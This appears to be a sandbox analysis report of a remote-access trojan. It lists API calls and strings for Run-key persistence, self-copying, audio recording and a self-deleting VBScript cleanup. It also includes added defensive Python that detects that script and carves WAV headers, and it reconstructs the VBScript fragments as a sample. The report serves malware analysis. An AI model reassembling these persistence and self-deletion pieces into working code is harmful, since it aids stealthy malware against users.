                        • Opcode ID: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                        • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                        • Opcode Fuzzy Hash: 4ed5f5d5e7ff342ec2a336c57b1c01b382e2bcaa191396cb8c86ed758bd95090
                        • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                        APIs
                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,00000000,?,0040D442,?,00000000), ref: 0040B8BB
                          • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                          • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A267,00000000,?,0040D442,?,00000000), ref: 0040B8D5
                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                        • ExitProcess.KERNEL32 ref: 0040D419
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                        • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                        • API String ID: 3797177996-2557013105
                        • Opcode ID: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                        • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                        • Opcode Fuzzy Hash: d286f588f5818cca07a6e4c27455efb45431ebdc6a01d8eb82299511fc22b521
                        • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
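The two uninstall functions above (the one that writes `\update.vbs` under Temp and the variant keyed on `pth_unenc`) share one string table: `On Error Resume Next`, `Set fso = CreateObject("Scripting.FileSystemObject")`, a `while fso.FileExists("...")` / `wend` spin until the executable is gone, `fso.DeleteFile "`, `fso.DeleteFolder "` and `fso.DeleteFile(Wscript.ScriptFullName)`, launched via ShellExecuteW `open` right before ExitProcess. RegDeleteKeyA is called with 80000001 (HKEY_CURRENT_USER) against `Software\Microsoft\Windows\CurrentVersion\Run\` and `...\Policies\Explorer\Run\`, so both of those HKCU locations are worth checking during response. The Python below is an added example, not code from the report or from the sample: it scans a dropped .vbs for that self-deleting cleanup pattern and extracts the paths it targets. The sample script is constructed by assembling the report's fragments in a plausible order with placeholder paths; the real ordering and the `exepath` value are not on the page.

```python
import re
from typing import Dict, List, Tuple

# Markers of the self-deleting uninstall script whose fragments appear in the
# report's string table.
MARKERS = {
    "suppress_errors": re.compile(r"\bOn Error Resume Next\b", re.I),
    "fso_object": re.compile(r'CreateObject\("Scripting\.FileSystemObject"\)', re.I),
    "wait_for_exit": re.compile(r"\bwhile\s+fso\.FileExists\([^)]*\)[\s\S]*?\bwend\b", re.I),
    "delete_file": re.compile(r'fso\.DeleteFile\s+"[^"]+"', re.I),
    "delete_folder": re.compile(r'fso\.DeleteFolder\s+"[^"]+"', re.I),
    "self_delete": re.compile(r"fso\.DeleteFile\(\s*WScript\.ScriptFullName\s*\)", re.I),
}

# Spinning on FileExists until the host binary is gone and then deleting the
# script itself is what separates this from ordinary cleanup code.
REQUIRED = ("wait_for_exit", "self_delete")


def scan_vbs(text: str) -> Dict[str, object]:
    """Report which markers a VBScript matches and whether it fits the pattern:
    both REQUIRED markers plus at least two of the others."""
    hits = {name: bool(rx.search(text)) for name, rx in MARKERS.items()}
    score = sum(hits.values())
    return {
        "hits": hits,
        "score": score,
        "match": all(hits[r] for r in REQUIRED) and score >= 4,
    }


def extract_targets(text: str) -> List[Tuple[str, str]]:
    """(action, path) pairs: the file the script waits on and what it deletes,
    so an analyst can go straight to the dropped binary and its directory."""
    targets: List[Tuple[str, str]] = []
    for m in re.finditer(r'fso\.FileExists\(\s*"([^"]+)"\s*\)', text, re.I):
        targets.append(("wait_until_gone", m.group(1)))
    for m in re.finditer(r'fso\.(DeleteFile|DeleteFolder)\s+"([^"]+)"', text, re.I):
        targets.append((m.group(1), m.group(2)))
    return targets


# Constructed sample: the report's fragments in a plausible order with
# placeholder paths (the sample fills these in at runtime from "exepath").
SAMPLE_VBS = r'''On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
while fso.FileExists("C:\Users\victim\AppData\Local\Temp\payload.exe")
wend
fso.DeleteFile "C:\Users\victim\AppData\Local\Temp\payload.exe"
fso.DeleteFolder "C:\Users\victim\AppData\Local\Temp\payload"
fso.DeleteFile(Wscript.ScriptFullName)
'''

# Constructed benign script: same object, but it neither waits nor self-deletes.
BENIGN_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\Temp\old.log"
'''

if __name__ == "__main__":
    print(scan_vbs(SAMPLE_VBS))
    print(extract_targets(SAMPLE_VBS))
```

Because the script deletes itself, it is usually gone by the time an analyst arrives; the point of `extract_targets` is to recover the binary and folder paths from a script captured in a sandbox or from an EDR file-write event before the deletion lands.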
                        APIs
                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                        • ExitProcess.KERNEL32(00000000), ref: 004124A0
                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                        • CloseHandle.KERNEL32(00000000), ref: 0041253B
                        • GetCurrentProcessId.KERNEL32 ref: 00412541
                        • PathFileExistsW.SHLWAPI(?), ref: 00412572
                        • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                        • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                          • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                        • Sleep.KERNEL32(000001F4), ref: 00412682
                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                        • CloseHandle.KERNEL32(00000000), ref: 004126A9
                        • GetCurrentProcessId.KERNEL32 ref: 004126AF
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                        • API String ID: 2649220323-436679193
                        • Opcode ID: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                        • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                        • Opcode Fuzzy Hash: 68a6d1683c491aa5f69a5158323edd29138381c8b32ecc661663b13424b24b94
                        • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                        APIs
                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                        • SetEvent.KERNEL32 ref: 0041B219
                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                        • CloseHandle.KERNEL32 ref: 0041B23A
                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                        • API String ID: 738084811-2094122233
                        • Opcode ID: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                        • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                        • Opcode Fuzzy Hash: a32571104eb0df3ab7bb69bc80b77b3340521799c31937e3b9a7319bb649b0aa
                        • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                        APIs
                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Write$Create
                        • String ID: RIFF$WAVE$data$fmt
                        • API String ID: 1602526932-4212202414
                        • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                        • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                        • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                        • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
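The thirteen WriteFile calls above, in order, emit "RIFF", a 4-byte size, "WAVE", "fmt ", a 4-byte chunk size, then 2/2/4/4/2/2-byte fields, "data" and a 4-byte size: that is exactly the canonical 44-byte PCM WAV header, so whatever this function writes lands on disk as a plain .wav. The Python below is an added example, not code from the Joe Sandbox report or from Remcos. It builds the same header in the same write order and, more usefully for an analyst, parses and carves such headers out of an arbitrary dump so recordings the sample left behind can be located. The WavHeader class and the function names are this example's own; the parser treats a header whose byte rate, block align or RIFF size do not agree with its other fields as a non-header, which is an assumption that a genuine PCM writer keeps those consistent.

```python
from __future__ import annotations

import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class WavHeader:
    """The variable fields of a 16-byte 'fmt ' chunk plus the data chunk size."""
    channels: int
    sample_rate: int
    bits_per_sample: int
    data_size: int

    @property
    def block_align(self) -> int:
        return self.channels * self.bits_per_sample // 8

    @property
    def byte_rate(self) -> int:
        return self.sample_rate * self.block_align


def build_wav_header(h: WavHeader) -> bytes:
    """Emit the 44-byte header in the same 13-write order as the function above."""
    pcm_format = 1        # WAVE_FORMAT_PCM
    fmt_chunk_size = 16   # size of the PCM 'fmt ' payload
    riff_size = 4 + (8 + fmt_chunk_size) + (8 + h.data_size)
    return b"".join([
        b"RIFF",
        struct.pack("<I", riff_size),
        b"WAVE",
        b"fmt ",
        struct.pack("<I", fmt_chunk_size),
        struct.pack("<H", pcm_format),
        struct.pack("<H", h.channels),
        struct.pack("<I", h.sample_rate),
        struct.pack("<I", h.byte_rate),
        struct.pack("<H", h.block_align),
        struct.pack("<H", h.bits_per_sample),
        b"data",
        struct.pack("<I", h.data_size),
    ])


def parse_wav_header(blob: bytes) -> WavHeader | None:
    """Return the header if blob starts with a self-consistent PCM WAV header, else None."""
    if (len(blob) < 44 or blob[0:4] != b"RIFF"
            or blob[8:12] != b"WAVE" or blob[12:16] != b"fmt "):
        return None
    riff_size, = struct.unpack_from("<I", blob, 4)
    fmt_size, fmt, ch, rate, byte_rate, align, bits = struct.unpack_from("<IHHIIHH", blob, 16)
    if fmt_size != 16 or fmt != 1 or blob[36:40] != b"data":
        return None
    data_size, = struct.unpack_from("<I", blob, 40)
    h = WavHeader(ch, rate, bits, data_size)
    # Assumption: a real recorder keeps the derived fields consistent, so a
    # mismatch means this is not a header (or is a deliberately corrupted one).
    if byte_rate != h.byte_rate or align != h.block_align or riff_size != 36 + data_size:
        return None
    return h


def carve_wav_headers(dump: bytes) -> list[tuple[int, WavHeader]]:
    """Scan a memory or disk dump for well-formed PCM WAV headers; return (offset, header)."""
    found: list[tuple[int, WavHeader]] = []
    pos = dump.find(b"RIFF")
    while pos != -1:
        h = parse_wav_header(dump[pos:pos + 44])
        if h is not None:
            found.append((pos, h))
        pos = dump.find(b"RIFF", pos + 1)
    return found


if __name__ == "__main__":
    # Constructed demo input, not a real dump: two headers with junk between them.
    demo = (b"\x00" * 7 + build_wav_header(WavHeader(1, 44100, 16, 1000))
            + b"\x00" * 1000 + b"RIFFjunk" + build_wav_header(WavHeader(2, 8000, 8, 16)))
    for off, hdr in carve_wav_headers(demo):
        print(f"0x{off:08x}: {hdr.channels} ch, {hdr.sample_rate} Hz, "
              f"{hdr.bits_per_sample}-bit, {hdr.data_size} data bytes")
```

Because the sandbox lists the arguments as seen at the call site (register contents and stack pointers, not the field values), the constants shown above cannot be read off as the sample rate or channel count; carving the written file and parsing it is how those are recovered.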
                        APIs
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000001,0040764D,C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                        • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                        • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                        • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                        • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                        • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                        • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: C:\Users\user\AppData\Roaming\jdSldfVS.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                        • API String ID: 1646373207-2239704826
                        • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                        • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                        • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                        • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                        APIs
                        • _wcslen.LIBCMT ref: 0040CE07
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                        • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                        • _wcslen.LIBCMT ref: 0040CEE6
                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                        • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\jdSldfVS.exe,00000000,00000000), ref: 0040CF84
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                        • _wcslen.LIBCMT ref: 0040CFC6
                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                        • ExitProcess.KERNEL32 ref: 0040D062
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                        • String ID: 6$C:\Users\user\AppData\Roaming\jdSldfVS.exe$del$open
                        • API String ID: 1579085052-811573952
                        • Opcode ID: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                        • Opcode Fuzzy Hash: 796ba6405bd8a90df0372751ab310b3abe3628a0db2faaf63edc81667cb98c6a
                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                        APIs
                        • lstrlenW.KERNEL32(?), ref: 0041C036
                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                        • lstrlenW.KERNEL32(?), ref: 0041C067
                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                        • _wcslen.LIBCMT ref: 0041C13B
                        • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                        • GetLastError.KERNEL32 ref: 0041C173
                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                        • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                        • GetLastError.KERNEL32 ref: 0041C1D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                        • String ID: ?
                        • API String ID: 3941738427-1684325040
                        • Opcode ID: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                        • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                        • Opcode Fuzzy Hash: abe7e308a1a6702f98718e9be80ca678ae2d2d31c1c14d85f2c6eaae61ca29ed
                        • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                        • String ID: IA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                        • API String ID: 2490988753-1941338355
                        • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                        • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                        • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                        • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$EnvironmentVariable$_wcschr
                        • String ID:
                        • API String ID: 3899193279-0
                        • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                        • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                        • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                        • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                        • Sleep.KERNEL32(00000064), ref: 00412E94
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                        • String ID: /stext "$0TG$0TG$NG$NG
                        • API String ID: 1223786279-2576077980
                        • Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                        • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                        • Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
                        • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnumOpen
                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                        • API String ID: 1332880857-3714951968
                        • Opcode ID: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                        • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                        • Opcode Fuzzy Hash: 131f557390299a5fb98f0b65c13fdfd9cb57ca643134b75c275777f897c8710a
                        • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                        APIs
                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                        • GetCursorPos.USER32(?), ref: 0041D5E9
                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                        • ExitProcess.KERNEL32 ref: 0041D665
                        • CreatePopupMenu.USER32 ref: 0041D66B
                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                        • String ID: Close
                        • API String ID: 1657328048-3535843008
                        • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
